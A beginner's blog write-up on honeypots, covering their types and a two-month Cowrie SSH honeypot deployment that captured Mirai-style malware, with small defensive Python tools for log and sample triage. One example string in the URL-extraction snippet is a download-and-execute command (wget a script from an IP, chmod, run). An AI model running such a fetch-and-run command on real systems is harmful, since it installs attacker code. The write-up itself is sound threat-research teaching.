A Beginner's Tale of Honeypots
You may have come across the term honeypot either when studying or working in the cyber security industry. What is a honeypot? According to Wikipedia, a honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorised use of information systems.
I see a honeypot as a system deliberately configured to gather data on the current cyber security landscape and to test a hypothesis. The real-world counterpart of a honeypot is the honeytrap, which involves the use of romantic relationships for interpersonal, political, or monetary purposes.
Honeypots can collect a wide range of data. This ranges from simple data such as IP addresses, domain names, domain name system (DNS) queries and brute-forced username/password combinations to more complex data such as malware drops or cryptominers. However, if it is not analysed, all of this remains just threat data. Performing a general analysis yields threat information, which gives you an overview of the cyber security landscape. The holy grail is to derive threat intelligence by combining this information with context. Threat data and information become threat intelligence when they lead to actionable information.
Deep dive into honeypots
Honeypots can be classified by deployment or by interaction level. By deployment, there are two types, namely production honeypots and research honeypots.
Production honeypots are placed in a live organisation network to detect threats or malicious actors in their network.
Research honeypots, as the name suggests, are used for research purposes. They are usually created to gather information on the latest threat landscape or malware.
Another way is to classify them as either low interaction or high interaction honeypots. Low interaction honeypots are also sometimes referred to as low-medium interaction honeypots. These honeypots essentially emulate a certain service. For example, Cowrie emulates an SSH service while Mailoney emulates the SMTP service. Low interaction honeypots have certain drawbacks, such as the inability to fully replicate the real service. Hence, if an attacker runs a command that the honeypot does not handle and it crashes or responds oddly, the attacker may figure out that they are inside a honeypot. An advantage of low interaction honeypots is that they can be started by running a simple script, so they are relatively easy for a beginner to get started with.
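To make the idea of emulating a service more concrete, here is a toy sketch of a fake shell in Python. It is not how Cowrie is implemented, and the handler names and canned outputs are made up for illustration. The point is only that every command needs an explicit handler, and that anything unhandled should fall back to a plausible reply instead of crashing.

```python
import shlex
from typing import Callable, Dict, List

# Hypothetical canned responses; a real honeypot emulates far more.
HANDLERS: Dict[str, Callable[[List[str]], str]] = {
    "whoami": lambda args: "root",
    "pwd": lambda args: "/root",
    "uname": lambda args: "Linux",
    "echo": lambda args: " ".join(args),
}


def emulate(command_line: str) -> str:
    """Return a fake response for one command line typed by the attacker."""
    try:
        parts = shlex.split(command_line)
    except ValueError:
        # Unbalanced quotes and similar input: fall back to a naive split
        # so that odd input does not crash the emulator.
        parts = command_line.split()
    if not parts:
        return ""
    name, args = parts[0], parts[1:]
    handler = HANDLERS.get(name)
    if handler is None:
        # Unknown command: answer the way a real shell would.
        return f"bash: {name}: command not found"
    try:
        return handler(args)
    except Exception:
        # A buggy handler should never take the whole honeypot down.
        return ""


if __name__ == "__main__":
    for line in ["whoami", "uname", "nmap -sV 10.0.0.1"]:
        print(f"$ {line}")
        print(emulate(line))
```

Even with a fallback like this, a long run of "command not found" replies for common tools is itself a giveaway, which is one reason attackers can often fingerprint low interaction honeypots.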
High interaction honeypots, on the other hand, are actual machines or networks deliberately configured to be vulnerable. They can be highly realistic, given that they are actual machines. This setup can be much harder and more expensive to maintain if you are looking to implement a complex network that mimics a corporate network. Capturing what the attacker did is also harder. With Cowrie, the TTY logs are captured by IP address and stored in a file, so it is quite easy to use this data. In a high interaction honeypot, unfortunately, the easiest way seems to be to rely on the OS logging mechanism. On a system running Linux, for example, a record of the commands entered can be found in the .bash_history file in the user’s home directory. By default, the .bash_history file does not store the time each command was executed. The file is also prone to tampering, as commands can be added to or deleted from it.
The different classifications of honeypots are not mutually exclusive. Depending on the desired goal of the honeypot, a research honeypot can be a high or low interaction honeypot, and the same is true for a production honeypot.
Insights gained from this deployment
The Honeynet Quarter (HNQ) has been exploring open-source honeypots, and the first honeypot we decided to start with is Cowrie. Cowrie is a medium interaction SSH honeypot designed to log brute force attacks and shell interactions performed by attackers, and to capture malware drops. Cowrie also supports a high interaction mode where it acts as a proxy to an actual system and monitors the traffic. However, we will not be touching on this as we have not tried it out yet. (Maybe the next writeup? 😉) This article is not a step-by-step guide on how to set up a Cowrie honeypot. Rather, it shares some insights that we gained from running one. The documentation in Cowrie’s GitHub repo should provide sufficient information for you to set one up.
We experimented with this honeypot from July to September 2020. Our setup consisted of a server running an instance of Cowrie, which forwarded its logs to another server running the Elastic Stack, allowing us to parse and easily search the logs.
We collected lots of data in a span of about 2 months. Our configuration of Cowrie was set up to accept any password with the username root, and we received many connections within the first few hours. Over the course of the next few weeks, we saw even more connections, shell interactions, malware drops and so on. Cowrie stores each malware drop in a file named after its SHA-256 hash, which makes it very easy to search VirusTotal for the hash and check whether the file has been seen before. It is good practice to search by hash rather than upload the file to VirusTotal, so that the attacker will not be “notified” that we have discovered them, especially when it is a new piece of malware. From our observations, most of the malware samples we managed to collect were variants of the Mirai botnet. We also observed what appeared to be automated attacks, which would likely target other IPs with an SSH service exposed to the internet in the same way.
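If you copy samples off the honeypot, it is worth confirming that each file still matches the hash in its name before searching for that hash. Below is a minimal Python sketch of that check. It assumes the file name is exactly the lowercase SHA-256 hex digest of the contents; the function names are our own, and it only computes hashes locally without contacting VirusTotal.

```python
import hashlib
import sys
from pathlib import Path


def sha256_of_file(path: Path, chunk_size: int = 65536) -> str:
    """Return the SHA-256 hex digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def filename_matches_hash(path: Path) -> bool:
    """True if the file name equals the SHA-256 of the file contents."""
    return path.name.lower() == sha256_of_file(path)


if __name__ == "__main__":
    # Usage: python check_hashes.py <sample> [<sample> ...]
    for arg in sys.argv[1:]:
        sample = Path(arg)
        status = "ok" if filename_matches_hash(sample) else "MISMATCH"
        print(f"{sha256_of_file(sample)}  {status}")
```

The printed digest is the value you would paste into a hash search, so the sample itself never has to leave your machine.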
Here are some statistics. In total, we collected 24 unique malware samples and 62 unique TTY logs (what the attacker saw on the command line while running commands and interacting with the honeypot).
Attached are samples of some of the malware and TTY logs we captured. The SHA-256 hash of each has also been provided. Note that only basic analysis has been performed on the malware, such as checking whether it has already been “seen in the wild” (meaning other honeypots and researchers already know of its existence) and examining the file type.
Looking at the file header in the 2nd image, we can see that it starts with “ELF”, the signature of the Executable and Linkable Format used for executables on Linux systems.
The file was similar to Sample 2 and is an ELF file.
One of the more unusual files was flagged as malicious by antivirus engines even though it appears to be an SSH key.
We also found 2 malware hashes with no match on VirusTotal:
Running the file command as a quick first check shows that it is an ELF file, a Linux executable.
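The file command recognises ELF files by their first few bytes, and the same check is easy to sketch in Python. An ELF file starts with the byte 0x7F followed by the letters "ELF"; the next two bytes give the class (32-bit or 64-bit) and the byte order. The function names below are our own, and this is only a first-pass triage, not a replacement for proper analysis.

```python
import sys

ELF_MAGIC = b"\x7fELF"  # first four bytes of every ELF file


def is_elf(header: bytes) -> bool:
    """True if the given bytes start with the ELF magic number."""
    return header[:4] == ELF_MAGIC


def describe_elf(header: bytes) -> str:
    """Summarise the class and byte order stored right after the magic."""
    if len(header) < 6 or not is_elf(header):
        return "not ELF (or header too short)"
    bits = {1: "32-bit", 2: "64-bit"}.get(header[4], "unknown class")
    order = {1: "little-endian", 2: "big-endian"}.get(header[5], "unknown byte order")
    return f"ELF {bits} {order}"


if __name__ == "__main__":
    # Usage: python elf_check.py <sample> [<sample> ...]
    for path in sys.argv[1:]:
        with open(path, "rb") as handle:
            print(f"{path}: {describe_elf(handle.read(16))}")
```

Only the first 16 bytes are read, so the sample is never executed or fully loaded.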
Here is an example of a captured TTY log. The attacker attempts to download a file from an IP address and then execute it.
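Download attempts like this are a handy source of indicators. As a rough sketch, the Python below pulls URLs and hosts out of a command string with a regular expression. The pattern is deliberately simple and will miss obfuscated or non-HTTP/FTP downloads, and the command in the example is made up, using an IP address from a range reserved for documentation rather than one we actually captured.

```python
import re
from typing import List
from urllib.parse import urlsplit

# Simple pattern: scheme, then everything up to whitespace or a shell separator.
URL_PATTERN = re.compile(r"(?:https?|ftp)://[^\s;|&'\"<>]+")


def extract_urls(command: str) -> List[str]:
    """Return the distinct URLs found in a command line, in order seen."""
    urls: List[str] = []
    for url in URL_PATTERN.findall(command):
        if url not in urls:
            urls.append(url)
    return urls


def extract_hosts(command: str) -> List[str]:
    """Return the distinct hosts (IPs or domains) the URLs point to."""
    hosts: List[str] = []
    for url in extract_urls(command):
        try:
            host = urlsplit(url).hostname
        except ValueError:
            continue  # malformed URL, skip it
        if host and host not in hosts:
            hosts.append(host)
    return hosts


if __name__ == "__main__":
    # Made-up command for illustration only.
    example = "cd /tmp; wget http://192.0.2.10/bins.sh; chmod +x bins.sh; ./bins.sh"
    print(extract_urls(example))
    print(extract_hosts(example))
```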
Overall, it was a good experience for a beginner, as it was easy to set up and we had lots of data to play with. It provided a view of the general landscape and would have allowed us to harvest malicious IPs, or popular username/password combinations used by attackers.
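As an example of the kind of harvesting mentioned above, here is a minimal Python sketch that counts credential pairs and source IPs from Cowrie's JSON log, which has one JSON object per line. The event names (cowrie.login.success, cowrie.login.failed) and the username, password and src_ip fields are what we recall from Cowrie's JSON output, so treat them as assumptions and check them against your own logs. The function name and the log path passed on the command line are our own.

```python
import json
import sys
from collections import Counter
from typing import Iterable, Tuple

# Assumed Cowrie event identifiers for login attempts.
LOGIN_EVENTS = {"cowrie.login.success", "cowrie.login.failed"}


def summarise_logins(lines: Iterable[str]) -> Tuple[Counter, Counter]:
    """Count (username, password) pairs and source IPs across login events."""
    credentials: Counter = Counter()
    sources: Counter = Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        if not isinstance(event, dict) or event.get("eventid") not in LOGIN_EVENTS:
            continue
        credentials[(event.get("username"), event.get("password"))] += 1
        sources[event.get("src_ip")] += 1
    return credentials, sources


if __name__ == "__main__":
    # Usage: python summarise_logins.py <path to Cowrie JSON log>
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as handle:
            creds, srcs = summarise_logins(handle)
        print("Top credentials:", creds.most_common(10))
        print("Top source IPs:", srcs.most_common(10))
```

Counts like these are still only threat data. They become more useful once combined with context, such as whether the same IPs also dropped malware.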
However, having lots of data has its downsides too, as it is very easy to become overwhelmed in the sea of data. Yes, we had lots of IP addresses, domains and malware samples, but these will remain only data unless they are analysed and combined with context to become threat information or threat intelligence.
There are also several other considerations to take into account when choosing to use a low-medium interaction honeypot. For example, we noticed Cowrie crashing when it could not handle certain commands or certain file download attempts. Moreover, there are services that check whether a machine is a honeypot, such as “Honeypot or Not?” by Shodan (https://honeyscore.shodan.io/).
Moving on, we can experiment with other low-medium interaction honeypots to learn more about the services they emulate and about general attack patterns. We can also move on to building high interaction honeypots/networks and plant “breadcrumbs”, or small pieces of information, around them such that a breach almost cannot be automated. Lastly, it is important to hone our log and malware analysis skills so that we can derive better insights from our data.
Written By: Hugo Chia
Other Contributors: Emil Tan & Hoo Jun Hong